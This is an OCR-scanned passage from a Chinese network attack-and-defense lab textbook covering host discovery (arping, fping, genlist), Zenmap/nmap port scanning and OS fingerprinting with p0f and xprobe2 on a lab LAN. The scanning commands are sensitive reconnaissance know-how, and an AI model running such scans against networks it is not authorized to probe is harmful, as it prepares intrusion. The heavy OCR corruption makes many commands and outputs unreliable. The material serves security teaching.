root@bt:~# arping -c 5 192.168.1.108 
ARPING 192.168.1.108 
60 bytes :€3:e0:4e:a1:7b (192.168.1.108): index=0 time 强 10.000 usec 
60 bytes :e3:e0:4e:al:7b (192.168.1.108): index-1 time-1634:000.usec 
60 bytes :e3:e0:4e:al:7b (192.168.1.188): index-2 time-132.000 usSec 
60 bytes :e3:e0:4e:al;7b (192.168.1.108): indexz3 time-1267008 usec 
60 e from LISTSE Ba: tesa by (192. 16813 108); index38 Lime-139-e9e usec 


^ 92. "ea. 1.198 statistics A N 


5 packets transmitted,, 5 packets deut 0% unanswered (8 ‘extra) 


rootéàbt:-$ ] 


图 5-12 arping -c 5 192. 168. 1. 108 的 运行 过 程 和 结果 


步骤 5: fping 工具 的 应 用 。fping 工具 可 以 同时 加 多 个 目标 主机 (主机 列表 ) 发 送 ping 
(CMP ECHO) 请 求 包 。 主 机 列表 可 以 在 命令 行 中 指定 也 可 以 通过 包含 目标 主机 的 文件 指 
定 。 默 认 模 式 下 ,fping 通过 监视 目标 主机 的 回复 来 判断 主机 是 否 可 用 。 如 果 目 标 主 机 返回 
应 答 ,其 信息 将 会 从 目标 记录 清单 中 删除 ; 如 果 主 机 在 一 段 时 间 内 不 啊 应 (超时 或 超过 尝试 
次 数 ) ,该 主机 将 会 被 标记 为 不 可 达 。 上 默认 情况 下 ,fping 将 尝试 癌 每 个 目标 发 送 3 个 ICMP 
ECHO 数据 包 。 
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要 运行 fping, 可 从 Application 5€ FÉ. P 3€ }¥ BackTrack 一 InformationGathering 一 
Network Analysis 一 Identify Live Hosts--Fping 选项 打开 ,打开 后 会 先 出 现 该 命令 的 帮助 
文档 ,如 图 5-13 所 示 。 


^ v X Iroot@bt: ~ 


File Edit View Terminal Help 
lWpecified) 
-g generate target list (only if no -f specified) 
(specify the start and end IP-in-the-target list, or supply a IP 


netmask) 
(ex. fping -g 192.168.1.0 192-168:1.255 or Iping -g 192.168.1.0/ 


interval between sending ping packets (in millise) (default. 25) 
loop sending pings forever 
ping multiple interfaces on target host 
show targets by name (-d is equivalent) 
interval between ping packets to one target (in mibbkisec) 
(in looping and counténg modes, default 1008) 
guiet (don't skow per-target/per-ping results) 
Same as.-q, but show Summdby exe ry. n secands 
WumDer-et fetries (default|3) | 
print final.stats 
set source address 
individual target initial timeout (in millisec) (défdült 5909) 
set select timeout (default 18) 
show targets that are unreachable 
show version 
targets list of targets to check (if no -f specified) 


rootübt:-£ J 


5-13 “fping” 命 令 的 帮助 文档 


fping 可 以 识别 多 个 主机 ,如 通过 “fping 192. 168. 1. 108 192. 168. 1. 109”( 不 同 的 IP. 地 
址 之 间 用 一 个 空格 隅 开 ) 命 令 ,可 以 查看 当前 这 两 台 主 机 是 否 处 于 运行 状态 ,运行 过 程 和 结 


File Edit View Terminal Help 


tabt :-# 
ootàbt *-J 
ootGbt : ~# 
root@bt:~# fping 192.168.1.108 192.168.1.109 
192.168.1.1088 is alive 
192.168.1.189 is alive 
Ootabt:- 


| t'abt: 
Ah 


t 
D1 
potent: 
ootêbt 

D1 
- 


ibt: 


5-14 使 用 “fping 192. 168. 1. 108 192. 168. 1. 109” 命 令 同 时 查看 两 台 主 机 是 否 在 线 


男 外 ,如 果 需 要 查看 多 个 目标 主机 的 统计 结果 ,可 以 使 用 “fping -s” 加 一 个 或 多 个 域名 
(或 IP 地址 ) 命 令 , 如 图 5-15 所 示 。 

步骤 6: genlist 工具 的 应 用 。genlist 工具 用 于 生成 一 个 对 ping 探测 做 出 回应 的 主机 列 
表 。 要 启用 该 命令 ,可 以 进入 /usr/local/bin/genlist 目录 ,直接 执行 “genlist” 命 令 , 会 显示 
六 命令 的 帮助 文档 ,如 图 5-16 所 示 。 
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^ v X root@bt: ~ 
File Edit View Terminal Help 


oot@bt :~# fping -s 192.168.1.108 192.168.1.109 
192.168.1.1088 is alive 
192.168.1.189 is alive 


N 


targets 

alive 

unreachable 
unknown addresses 


«e CD N 


timeouts (waiting for response) 


ICMP Echos sent 
ICMP Echo Replies received 
other LCMP receiyed 


tmin Found trip Vine) 
(avg round trip time) 
(max round trip time) 
0.053 sec (elapsed real time) 


rootóbt : ~# 
rootebt: -4 
OOT bt:-42 


ootGbt : ~# ji 


图 5-15 使 用 “fping” 命 令 同 时 查看 多 个 目标 主机 


| wIx root@bt: ~ 
File Edit View Terminal Help 


ot@bt:~# /usr/local/bin/genlist 
: genlist [Input Type] [General Options] 


--Scan «target» Ping Target Range ex: 10.0.0.\* 
Scan Options: 
-n --nmap «path» Path to Nmap executable 


--inter «interface» Perform Nmap Scan using non default interface 


General Options: 
-Vv --Version Display version 


-h --help Display this information 


Send Comments ko Joshua D..ABrabam ( jaBLaGccs .neu.edu 目 
rogifbt sc 和 J 


图 5-16 “genlist "命令 的 帮助 文档 信息 


例如 ,如 果 要 显示 192. 168. 1. 0/24 网 段 中 的 可 用 主机 ,可 以 使 用 /usr/local/bin/ 
genlist -s 192. 168. 1. V « ”命令 来 进行 ,如 图 5-17 所 示 。 


5.2.4 任务 与 思考 
通过 本 实验 的 练习 ,读者 还 需要 继续 学 习 和 向 握 基于 TCP 协议 的 主机 扫描 方法 。 
基于 TCP 协议 的 主机 扫描 方法 的 关键 是 TCP 协议 的 三 次 握手 过 程 。 其 中 ,ACK 表示 


Server( 服 务 器 ) 对 Client( 客 户 端 ) 请 求 建 立 的 确认 ,但 是 ,如 果 Client 根本 没有 进行 SYN 
请 求 ( 第 一 次 握手 ) ,而 是 直接 进行 确认 (第 三 次 握手 ) ,Server 就 会 认为 出 现 了 一 个 重要 的 错 
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^ v X root@bt: ~ 
File Edit View Terminal Help 
root@bt:~# /usr/local/bin/genlist -s 192.168.1.^* 


,168.1.1 
.168.1.108 
.168.1.103 
2.168.1.104 
.168.1.105 
,168.1.106 
.168.1.108 
2.168.1.109 
,168.1.111 
.168.1.112 
.168.1.115 
2,168.1.179 
2.168.1.253 
ooteb t 3 


—— pd p mm 


5-17 使 用 genlist 工具 同时 显示 192.168. 1. 0/24 网 段 中 的 可 用 主机 


IR, E Client 发 送 一 个 头 部 “复位 ?7(RST) 字 段 为 1 的 报 文 ,告诉 Client 必须 释放 本 次 连接 ， 
再 重新 建立 TCP 连接 。 根 据 该 工作 机 制 , 如 果 攻 击 者 向 目标 主机 发 送 一 个 只 有 ACK 的 报 
文 , 当 接收 到 目标 主机 一 个 RST 反馈 报 文 时 ,就 可 以 确认 目标 主机 的 存在 。 

男 一 种 是 利用 TCP 协议 三 次 握手 过 程 针 对 主机 的 SYN 扫描 。 如 果 目 标 主机 处 于 运行 
状态 ,但 主机 上 的 服务 硕 进 程 没 有 打开 , 则 目标 主机 将 返回 一 个 RST 报 文 ; 如 果 目 标 主机 
上 的 服务 硕 进 程 处 于 "监听 ”(listen) 状态, 则 会 返回 一 个 第 二 次 握手 的 ACK/SYN RX. 
不 管 返 回 哪 一 种 报 文 , 都 可 以 从 中 判断 目标 主机 的 当前 状态 。 

以 上 探测 方法 ,需要 读者 在 继续 深入 学 习 TCP 及 相关 协议 工作 原理 的 基础 上 ,再 借助 
相关 的 工具 软件 ,通过 具体 的 实验 来 学 习 和 向 握 。 


5.3 端口 扫描 : Zenmap 工具 的 应 用 


5.3.1 预备 知识 : 端口 扫描 


端口 扫描 (Port Scan) 是 对 正 处 于 运行 状态 的 主机 使 用 的 TCP/UDP 端口 进行 探测 的 
技术 。 闯 口 是 用 于 标识 计算 机 应 用 层 中 的 各 个 进程 在 与 传输 层 交 互 时 的 层 间接 口 地 址 ,两 
台 计 算 机 间 的 进程 在 通信 时 ,不 仅仅 要 知道 对 方 的 IP. 地 址 ,还 要 知道 对 方 的 端口 号 。 为 此 ， 
可 以 将 端口 理解 为 进入 计算 机 应 用 进程 的 窗口 ,在 TCP 和 UDP 协议 中 端口 用 16b FRK 
示 , 其 值 为 0 一 65 535。 传 输 层 的 端口 分 为 服务 副 问 使 用 的 端口 号 和 客户 问 使 用 的 羡 口 号 两 
大 类 。 其 中 ,服务 硕 端 使 用 的 端口 号 又 分 为 两 类 : 一 类 称 为 熟知 端口 号 (Well Known 
Ports) 或 系统 端口 号 ,其 值 为 0 一 1023 ,可 以 在 http://www. iana. org 网 站 上 查 到 ; 另 一 类 
称 为 登记 端口 号 ,其 值 为 1024 一 49 151, 使 用 这 类 端口 时 需要 在 IANA (the Internet 
Assigned Numbers Authority, 互 联网 数字 分 配 机 构 ) 上 进行 登录 。 客 户 端 使 用 的 端口 号 称 
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为 短暂 端口 号 ,其 值 为 49152 一 65535 , 仅 在 客户 进程 运行 时 临时 使 用 ,通信 结束 后 收回 。 

由 于 TCP 协议 和 UDP 协议 可 以 使 用 相同 的 端口 号 (如 DNS 同时 使 用 了 TCP 53 和 
UDP 53 两 个 端口 号 ) ,因此 端口 扫描 需要 分 别针 对 TCP 和 UDP 协议 的 端口 号 进行 扫描 。 
由 于 TCP 协议 要 比 UDP 协议 复杂 ,因此 针对 TCP 端口 的 扫描 也 要 比 UDP 端口 扫描 复杂 。 
TCP 端口 扫描 包括 连接 (connect) 扫 描 、SYN 扫描 、TCP 窗口 扫描 、FIN 扫描 、ACK 扫描 等 。 

1. 连接 扫描 

攻击 者 (扫描 主机 ) 通 过 调用 系统 的 connect O AŽ. nf LA 5; Bb ENLA iA vig O 5 TAB 
过 三 次 握手 建立 TOP 连接 ,在 攻击 者 发 起 连接 请 求 (第 一 次 握手 ) 后 ,如 果 目 标 主机 上 对 应 
的 端口 打开 , 则 返回 一 个 第 二 次 握手 的 ACK/SYN 报 文 ,connect() 调 用 将 再 发 送 一 个 ACK 
确认 报 文 以 完成 第 三 次 握手 。 如 果 目 标 端口 是 关闭 的 ,那么 目标 主机 将 会 直接 返回 一 个 
RST 报 文 。 基 于 此 工作 原理 ,通过 分 析 不 同 目标 端口 的 返回 报 文 信息 ,攻击 者 就 可 以 判断 
哪些 端口 是 开放 或 关闭 的 。 该 方法 实现 简单 ,但 目标 主机 上 会 记录 相关 的 尝试 连接 信息 , 容 
易 被 系统 管理 员 或 安全 检测 软件 发 现 。 

2. SYN 扫描 


SYN 扫描 也 称 为 半 开 连接 扫描 ,是 对 连接 扫描 的 一 种 改进 。 在 连接 扫描 方法 中 , 当 被 
扫描 端口 打开 时 ,目标 主机 会 返回 一 个 SYN/ACK 报 文 。 当 攻击 者 收 到 第 二 次 握手 的 
SYN/ACK 报 文 时 ,其 实 不 需要 进行 第 三 次 ACK 握手 ,就 已 经 判断 出 被 扫描 端口 当前 处 于 
打开 状态 。 不 过 , 当 目 标 主机 (Server) 向 TCP 连接 请 求 者 (Client) 返 回 SYN/ACK 报 文 后 ， 
将 处 于 “ 半 开 连接 ”状态 ,等待 请 求 者 的 ACK 确认 ,以 便 完 成 第 三 次 握手 过 程 。 此 时 ,攻击 
者 并 没有 问 目 标 主机 返回 ACK 确认 报 文 ,而 是 构造 了 一 个 RST 报 文 ,让 目标 主机 释放 该 
“ 半 开 连接 ”。 

由 于 各 类 操作 系统 一 般 不 会 记录 “ 半 开 连接 ”信息 ,因此 SYN 扫描 的 安全 性 要 比 连接 
扫描 好 。 

3. UDP 端口 扫描 


UDP 端口 扫描 用 于 探测 目标 主机 上 打开 的 UDP 端口 和 网 络 服务 。UDP 端口 扫描 的 
实现 原理 是 : 首先 构造 并 回 目 标 主 机 发 送 一 个 特殊 的 UDP 报 文 ,如 果 被 扫描 的 UDP 端口 
关闭 ,将 返回 一 个 基于 ICMP 协议 的 “端口 不 可 达 ” 差 错 报 文 ; 如 果 被 扫描 的 UDP 端口 处 于 
打开 状态 ,处 于 “监听 ”状态 的 UDP 网 络 服务 将 啊 应 特殊 定制 的 数据 报 文 , 从 而 返回 UDP 
数据 。 

UDP 端口 扫描 的 实现 原理 简单 ,效率 较 高 。 但 是 ,如 果 被 探测 的 网 络 服务 是 一 个 未 知 
的 应 用 时 ,就 可 能 无 法 返回 UDP 数据 。 


5.3.2 实验 目的 和 条 件 


1. 实验 目的 

在 学 习 TCP 三 次 握手 、TCP/UDP 端口 .服务 进程 等 网 络 基 本 知识 的 基础 上 ,通过 对 
Zenmap 和 nmap 工具 使 用 方法 的 练习 ,进一步 掌握 端口 扫描 的 实现 方法 。 

2. 实验 条 件 

为 了 取得 更 好 的 实验 效果 ,建议 本 实验 在 局 域 网 中 进行 。 本 实验 中 攻击 者 仍然 采用 运 
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ÍT BT5 的 计算 机 ,需要 在 该 主机 上 运行 Zenmap 和 nmap 工具。 
5.3.3 实验 过 程 


步骤 1: 正确 登录 BT5 系统 。 如 果 进 入 的 是 命令 行 模式 ,为 方便 实验 进行 ,可 输入 
“startx” 命 令 切 换 到 图 形 界面 。 

步骤 2. ARRI EJ Terminal 选项 ,打开 终端 操作 窗口 , 

步骤 3: 可 以 依次 选择 Application Backtrack— Information Gather Network Analysis 
Network Scanners >Zenmap 选项 ,启动 Zenmap 工具 。 

Zenmap 提供 了 11 种 可 供 选 择 的 扫描 方式 ,可 以 通过 单 击 Profile XAMRA, A 
择 了 具体 的 扫描 方式 后 ,就 可 以 看 到 相应 扫描 方式 所 采用 的 命令 ,所 执行 的 命令 显示 在 
Command 杠 中 ,如 图 5-18 所 示 。 


Wed Jan 30, 11:39 AM 


Intense scan 


Intense scan 


g intense scan plus UDP 


M intense scan, all TCP ports gimis s 
Intense scan, no pinq 
Ping scan 
Quick scan 
Quick scan plus 
Quick traceroute 
Regular scan 


Slow comprehensive scan 


Filter Hosts 


[7] root@bt: ~ ©) root@bt: ~ m Zenmap 
5-18 ”Zenmap 提供 的 扫描 方式 


步骤 4: 如 果 扫 描 方 式 不 符合 攻击 者 的 当前 要 求 , 可 以 创建 一 个 新 的 扫描 (New Profile 
or Command) ,或 者 在 已 有 扫描 方式 的 基础 上 进行 编辑 (Edit Selected Profile) ,如 图 5-19 
所 示 。 

步骤 5. 在 本 实验 中 ,可 以 选择 New Profile or Command 选项 ,打开 Profile Editor 对 
话 框 , 如 图 5-20 所 示 。 在 Profile name 文本 框 中 输入 个 标识 本 次 扫描 操作 的 名 称 。 

步骤 6: 选择 Scan 选项 卡 后 ,出 现 如 图 5-21 所 示 的 对 话 框 。 在 该 对 话 框 中 出 现 了 
Profile、Scan、Ping、Scripting、Target、Source、Other、Timing 等 选项 。 读 者 可 根据 具体 的 攻 
击 实验 需要 进行 选择 和 配置 。 本 实验 将 对 192. 168. 1. 1-254 网 段 中 的 主机 端口 进行 扫描 ， 
所 有 信息 输入 结束 后 , 单 击 Save Changes 按钮 进行 确认 。 
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Zenmap 


Target: | 。 C a 


» — 国 | |scan| 
Command: |nmap -T4 -A -v 


= [Details 


Filter Hosts 


图 5-19 创建 一 个 新 扫描 方式 
Profile Editor 


[nmap -T4 -A - | 


Scan 


-Pir | | Help 
Profile Information 


Description 


The description is a full 
Profile name | | description of what the scan 
E | does, which may be long. 
Description 


| Cancel | i save Changes | 


5-20 Profile Editor X} i& 4E 


需要 说 明 的 是 ,在 具体 实验 过 程 中 ,读者 可 结合 不 同情 况 ,通过 选取 不 同 的 选项 ,学习 扫 


描 过 程 , 并 对 扫描 结果 进行 分 析 , 以 便 对 工具 的 应 用 和 功能 有 更加 全 面 的 认识 ,同时 对 知识 
f] zs 5c 3 e A Pr BU, 


步骤 7: 选择 nmap 选项 ,如 图 5-22 所 示 。 
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< Profile Editor 


|nmap -85 -PS 192.168.1.1-254 Scan 


Help 
sinis Version detection 
Scan ade 


Attempt to discover the 
Targets (optional): 192.168.1.1-254 version number of services 


running on remote ports. 
TCP scan: TCP SYN scan (-sS) v 
None v | 


None v 
( Enable all advanced/aggressive options (-A) 
O Operating system detection (-O) 
O Version detection (-sV) 


( Idle Scan (Zombie) (-sI) | 
O FTP bounce attack (-b) 


O Disable reverse DNS resolution (-n) 
O IPv6 support (-6) 


Non-TCP scans: 


Timing template: 


M Services Nmap Output | Ports fi 


| Filter Hosts | | 


5-22 选择 nmap 选项 


步骤 8. 单 击 Scan 按钮 ,开始 对 192. 168. 1. 1-254 网 段 存在 的 主机 进行 端口 扫描 ,扫描 

结果 如 图 5-23 所 示 。 其 中 ,在 Host 列表 中 显示 了 当前 处 于 运行 状态 的 所 有 主机 ,在 右 侧 列 

表 中 显示 了 其 中 一 台 主 机 当前 打开 的 端口 信息 ,包括 端口 号 、 当 前 状态 、 服 务 进程 的 名 称 及 
主机 网 卡 的 MAC 地 址 等 内 容 ， 收集 到 的 信息 非常 全 面 。 
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Target: |192.168.1.1-254 v | Profile: [nmap I| |Scan| 


Command: [nmap -SS -PS 192.168.1.1-254 


一 


Filter Hosts 


步骤 9. 单 击 Topology 按钮 ,可 以 查看 扫 摘 发 现 的 网 络 拓扑 结构 ,如 图 5-24 所 示 。 


Target: |192.168.1.1-254 


192.168.1.10: 
bogon (192.16 
192.168.1.10 

bogon (192.1 

192.168.1.112 
bogon (192.16 
192.168.1.11€& 
192.168.1.11€ 


Filter Hosts 


步骤 10. 如 果 要 保存 Zenmap 的 扫描 结果 ,可 以 选择 Scan Save Scan 选项 


S| nmap -sS -PS 192.168.1.1-254 M | 


Starting Nmap 6.01 ( http://nmap.org ) at 
2013-01-30 11:54 EST 
Nmap scan report for 192.168.1.1 
Host is up (0.00036s latency). 
Nol shown: 996 closed ports 
STATE SERVICE 
open telnet 
open http 
1723/tcp open pptp 
1900/tcp open upp 
MAC Address: 6C:E6:73:FF:3C:04 (Unknown) 


Nmap scan report for bogon (192.168.1.180) 
Host is up (0.000084s latency). 

Not shown: 991 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

80/tcp open http 

111/tcp open rpcbind 


图 5-23 显示 扫描 结果 


Profile: |nmap v |Scan| 
Command: = -SS -PS 192.168.1.1-254 


| Hosts Viewer | Fisheye | Controls | 


192.168.1.115) 
on Lr 183 (192.168.1.179) 


e 19. 168. ap dil (192.168.1.100) 
,人 0 同 192 168.1.112 


辐 bogon (192.168.1.111) 
un 168.1.118 


d: 
Owi 138 k 


图 5-24 显示 扫描 结果 的 拓扑 


存 ,默认 保存 格式 为 . xml, 如 图 5-25 所 示 。 


| Details | 


| Save Graphic | 


,并 进 


行 保 
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Save in folder: |H Desktop 


‚+| Browse for other folders 


Select File Type: | Nmap XML format (.xml) v | 


5-25 ”保存 当前 的 扫描 结果 


步骤 11: 在 实验 中 ,可 以 对 同一 对 象 范围 或 同一 对 象 范围 中 的 不 同 部 分 进行 多 次 扫 质 ， 
并 对 扫描 结果 进行 比较 ,看 是 否 存 在 不 同 。 本 实验 中 ,在 保存 了 第 一 次 扫描 结果 后 ,接着 修 
改 扫描 目标 (如 192.168.1.1-118)( 缩 小 了 扫描 范围 ) ,然后 进行 第 二 次 扫描 ,并 保存 扫描 结 
果 , 将 文件 名 确定 为 nmap02. xml。 

然后 ,选择 Tools Compare Results 选项 ,对 两 次 扫描 结果 进行 比较 。 其 中 ,在 A Scan 
下 拉 列 表 中 选择 nmap on 192. 168. 1. 1-118 选项 ,在 B Scan 下 拉 列 表 中 选择 nmap on 192. 
168. 1-254 选项 ,比较 结果 如 图 5-26 所 示 。 


* Compare Results 


A Scan B Scan 
nmap on 192.168.1.1-118 | v | | Open| | Open. 
(+| Scan Output [+] Scan Output 
-Nmap 6.01 scan initiated Wed Jan 30 12:08:23 2013 as: nmap -SS -PS 192.168.1.1-118 -> 
+Nmap 6.01 scan initiated Wed Jan 30 11:54:52 2013 as: nmap 


192.168.1.1, 6C:E8:73:FF:3C:84: 
Host is up. 

Not shown: 996 closed ports 
PORT STATE SERVICE VERSION 
23/tcp open telnet 

80/tcp open http 

1723/tcp open pptp 

1908/tcp open upnp 


bogon (192.168.1.108, 28:51:32:03:45:E6): 
Host is up. 

Not shown: 991 closed ports 

PORT STATE SERVICE VERSION I 
22/tcp X open ssh 

80/tcp open http 

lll/tcp open rpcbind 

443/tcp open https 


Atm fd 


[close] 


图 5-26 ”对 两 次 扫描 结果 进行 比较 分 析 


其 中 ,字符 “-” 表 明 B Scan 中 没有 该 行 结果 ,相应 地 ,字符 “十 ”表明 B Scan 中 增加 了 该 
AMAR. 
由 图 5-26 中 可 以 看 出 ,两 次 扫描 的 IP 范围 不 同 。 


5.3.4 任务 与 思 


通过 本 实验 ,使 读者 可 以 对 nmap 和 Zenmap 两 个 典型 工具 的 功能 特点 和 使 用 方法 有 


174 网 络 攻 击 与 防御 实 训 


一 个 较为 全 面 的 认识 ,通过 比较 分 析 ,读者 也 可 以 掌握 更 多 有 关 端 口 扫 描 的 知识 。 与 nmap 
相 比 ,Zenmap 的 优势 表现 在 以 下 几 个 方面 。 
(OD 提供 良好 的 交互 性 。Zenmap 以 直观 的 方式 输出 结果 ,甚至 能 绘制 发 现 网 络 的 拓扑 。 
(2) 可 以 在 两 个 扫描 结果 之 间 进 行 比较 。 
(3) 能 够 对 扫 摘 结果 进行 跟踪 。 
(4) 能 够 帮助 渗透 测试 人 员 多 次 运行 相同 配置 进行 扫描 。 
(5) 显示 所 执行 的 命令 ,以 方便 渗透 测试 人 员 检 查 。 


5.4 系统 炎 型 探测 : 主机 系统 识别 


5.4.1 预备 知识 : 主机 探测 


通过 主机 扫描 和 端口 扫描 ,可 以 确定 被 攻击 目标 使 用 的 IP 地 址 及 开放 的 端口 。 在 此 基 
而 上 ,还 需要 对 被 攻击 主机 所 使 用 的 操作 系统 类 型 和 具体 的 版 本 号 及 提供 的 网 络 服务 进行 
探测 ,为 攻击 者 下 一 步 选择 具体 的 攻击 方法 并 确定 具体 的 攻击 步骤 做 好 准备 。 系 统 类 型 探 
测 分 为 操作 系统 类 型 探测 和 网 络 服务 类 型 探测 两 种 。 

1. 操作 系统 类 型 探测 

操作 系统 类 型 探测 (OS Identification) 是 通过 采取 一 定 的 技术 手段 ,通过 网 络 远 程 探测 
目标 主机 上 安装 的 操作 系统 类 型 及 其 版 本 号 的 方法 。 在 确定 了 操作 系统 的 类 型 和 具体 版 本 
只 后 ,可 以 为 进一步 发 现 安全 漏洞 和 渗透 攻击 提供 条 件 。 

协议 栈 指纹 分 析 (Stack fingerprinting) 是 一 种 主流 的 操作 系统 类 型 探测 手段 ,其 实现 
原理 是 在 不 同类 型 和 不 同 版 本 的 操作 系统 中 ,网 络 协议 栈 的 实现 方法 存在 着 一 些 细微 的 区 
别 ,这些 细微 区 别 就 构成 了 该 版 本 操作 系统 的 指纹 信息 。 通 过 创建 完整 的 操作 系统 协议 栈 
指纹 信息 库 ,将 探测 或 网 络 嗅 探 所 得 到 的 指纹 信息 在 数据 库 中 进行 比 对 ,就 可 以 精确 地 确定 
其 操作 系统 的 类 型 和 版 本 号 。 

2. 网 络 服 务 类 型 探测 

网 络 服务 类 型 探测 (Service Identification) 的 目的 是 确定 目标 主机 上 打开 的 端口 ,以 及 
该 端口 上 绑 定 的 网 络 应 用 服务 类 型 及 版 本 号 。 通 过 网 络 服务 类 型 探测 ,可 以 进一步 确定 目 
标 主 机 上 运行 的 网 络 服务 及 服务 进程 对 应 的 端口 。 

操作 系统 类 型 探测 主要 依赖 于 TCP/IP 协议 栈 的 指纹 信息 , 它 涉 及 网 络 层 、 传 输 层 .应 
用 层 等 各 层 的 信息 ,而 网 络 服务 类 型 探测 主要 依赖 于 网 络 服务 在 应 用 层 协 议 实 现 所 包含 " 
特殊 指纹 信息 。 例 如 ,同样 是 在 应 用 层 提供 HTTP 服务 的 Apache 和 IIS, 两 者 在 实现 
HTTP 协议 规范 时 的 具体 细节 上 存在 一 些 差 异 , 根 据 这 些 差异 就 可 以 辨别 出 目标 主机 的 
TCP 80 w H E35 £7 HJ HTTP 服务 是 通过 Apache 还 是 通过 IIS 实现 的 。 


5.4.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,使 读者 对 网 络 服务 进程 有 更 深入 的 学 习 , 同 时 通过 对 主机 系统 识别 工具 使 
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用 方法 的 练习 ,掌握 主机 识别 的 主要 方法 和 途径 。 
2. 实验 条 件 
为 便于 实验 的 进行 ,本 实验 采用 表 5-1 所 示 的 实验 清单 。 
表 5-1 主机 识别 实验 清单 


a me A 
一 xprobe? 
EE — | 18 

XE pL 操作 系统 版 本 Windows Server 2003 
X 


5.4.3 实验 过 程 


步骤 1: 运行 攻击 机 。 正 确 登 录 BTS 系统 ,如 果 进 入 的 是 命令 行 模式 ,为 方便 实验 进行 ， 
可 输入 “startx” 命 令 进 入 图 形 界面 。 选 取 菜 单 栏 上 的 Terminal 选项 ,打开 终端 操作 窗口 。 

步骤 2: 运行 pof TH. pof 是 以 一 个 用 被 动 方 式 探测 目标 主机 操作 系统 类 型 的 工具 ， 
该 工具 可 以 工作 在 连接 到 本 地 的 机 器 .本 地 连接 到 的 机 更 \ 不 能 连接 到 的 机 天、 可 以 浏览 . 
社区 的 机 需 等 几 种 场景 下 。 可 以 依次 选择 Application 一 BackTrack ^ Information Gathering 
Network Analysis OS Fingerprinting— p0f 选项 启动 。 局 动 后 ,系统 将 显示 其 所 有 人 参数 及 
帮助 说 明 ,如 图 5-27 所 示 。 


^ vw X root@bt: ~ 
File Edit View Terminal Help 


- verbose masquerade flags reporting 

- use fuzzy matching (do not combine with -R) 
- do not report distances and link-media 

- do not report OS details (just genre) 

- do not display unknown signatures 

- do not display known signatures (for tests) 
- report signatures even for known syStems 

- go into SYN+ACK mode (semi-suppórted) 

- go into RST/RST«ACK mode (semi-supported) 

- go into stray ACK mode (barely supported) 

- resolve host names (not recommended) 

- be quiet - no banner 

- enable support for 802.10 VLAN frames 

- Bwitch card .£olpromistuousi mode 

- BHaelon.aOd8 (fürK intü badkgrneung) 

- tum unac-cuXx€g 

- include full packet dümp (for^debugginq) 

- display payload string (useful in RST mode) 
- run signature collision check 

- add timestamps to every entry 


-V 
-F 
-N 
-D 
-U 
-K 
-5 
-A 
-R 
-0 
-T 
-q 
-V 
-p 
;d 
-t 
-X 
-X 
-C 
-t 


'Filter rule' is an optional pcap-style BPF expression (man tcpdump). 


lrootébt :~# 四 


图 5-27 启动 p0f 后 显示 的 帮助 信息 


步骤 3. 打开 该 程序 后 ,首先 输入 “p0f -o pof. Log” 命 令 ,该 命令 会 将 登录 信息 保存 到 
p0f. Log 文件 中 ,如 图 5-28 所 示 。 
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^ v X root@bt: ~ 
File Edit View Terminal Help 


root@bt :~# pof -o poOf.log 

pOf - passive os fingerprinting utility, version 2.0.8 

(C) M. Zalewski «lcamtufiQdione.cc», W. Stearns-«wstearnsQpobox.com» 

pO0f: listening (SYN) on 'eth8', 262 sigs (14 generic, cksum 9RJF5CA2), rule: 'al 
i'. 


图 5-28 输入 “p0f -o pOf. Log” 命 令 将 登录 信息 保存 到 pOf. Log 文件 中 


步骤 4: 接 下 来 ,打开 Windows Server 2003 并 正 篆 登录 ,运行 靶 机 。 
靶 机 正常 启动 后 ,需要 产生 en 活动 ,以 触发 TOP Mik: 例如 ,可 以 Telnet 到 
台 主 机 (根据 实验 环境 而 定 ) ,接着 就 会 识别 系统 类 型 。 这 里 Telnet 虽然 没有 成 功 ,但 不 影 
- 验 效果 ,如 图 5-29 所 示 。 


cm SERM E 
Microsoft Windows [版 本 5. 2.379801 
«C» hRAVPI 1985-2803 Microsoft Corp. 


C:\Documents and SettingsMdministrator»ping 192.168.1. 
Pinging 192.168.1.114 vith 32 bytes of data: 


Reply from 192.168.1.114: bytes-32 time<íms IIL=64 
Reply from 192.168.1.114: bytes-32 time«ims IIL=b4 
Reply from 192.168.1.114* bytes-32 time<ims TTL=64 
Reply from 192.168.1.114: bytes-32 time<ims TTL=64 


Ping statistics for 192.168.1.114: 

Packets: Sent = 4, Received = 4, Lost = O XU» loss», 
Efipproximate round trip times in milli-seconds: 

Minimum = BÜms, Maximum = Üms, Average = Ams 


X 


t Documents and Settings VMidministrator»telnet 192.168.1.114 23 


- -不 能 打开 到 主机 的 连接 ， 在 端口 23: 连接 失败 


fC: Documents and Settings Mdministrator»?, 


图 5-29 通过 telnet 命令 任意 触发 一 个 TCP 连接 
步骤 5: 接 下 来 ,在 攻击 机 上 查看 pOf. Log 文件 。 通 过 “cat pOf. Log" fi 4 2r Briu ok H 
EE XP 或 2000 SP4 T. 里 然 探测 结果 和 实 
际 情况 有 些 出 人 ,但 还 是 大 概 探 测 出 了 主机 的 系统 类 型 ,如 图 5-30 F 
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^ v X root@bt: ~ 
File Edit View Terminal Help 


root@bt:~# cat p8f.log 

«Wed Jan 30 21:17:12 2013» 192.168.1.113:1122 Windows 2000 SP4, XP SPl+ 
-» 192.168.1.114:23 (distance 0, link: ethernet/modem) 

«Wed Jan 30 21:17:13 2013» 192.168.1.113:1122 - Windows 2000 SP4, XP SP1« 
-> 192.168.1.114:23 (distance 80, link: ethernet/modem) 

«Wed Jan 30 21:17:13 2013» 192.168.1.113:1122 - Windows 2000 SP4 XP SP1«4 
-» 192.168.1.114:23 (distance 8, link: ethernet/modém) 

bt:- 


B]5-30 ”分 析 探 测 到 的 主机 类 型 


步骤 6: 使 用 xprobe2 工具 进行 主机 类 型 的 探测 。xprobe2 是 一 个 主动 的 操作 系统 识 
别 工 具 ,通过 模糊 签名 匹配 、 可 能 性 猜测 、 同 时 多 匹配 和 签名 数据 库 来 识别 操作 系统 。 因 为 
该 工具 使 用 原始 套 接 字 , 所 以 必须 运行 在 root 权限 下 。 可 以 依次 选择 BackTrack 一 
Information Gathering-* Network Analysis 一 OS Fingerprinting- Xprobe2 选项 启动, 启动 
后 会 显示 其 语法 和 选项 说 明 ,如 图 5-31 所 示 。 


|^ v x rootGbt: ~ 
File Edit View Terminal Help 


«send delay» Set packsending delay (milseconds). 

«debuglv» Specify debuggt*ne-Lauel. 

«modnum» Disable module number «motum». 

«modnum» Enable modwte-Tiiber «modnüm . 
Display modules. 

«numofmat ches» Specify number^of matches tgfprint: 

«portspec» Enable TCP"portscan for spBCified port $9. 
Example: -T21-23,53,110 

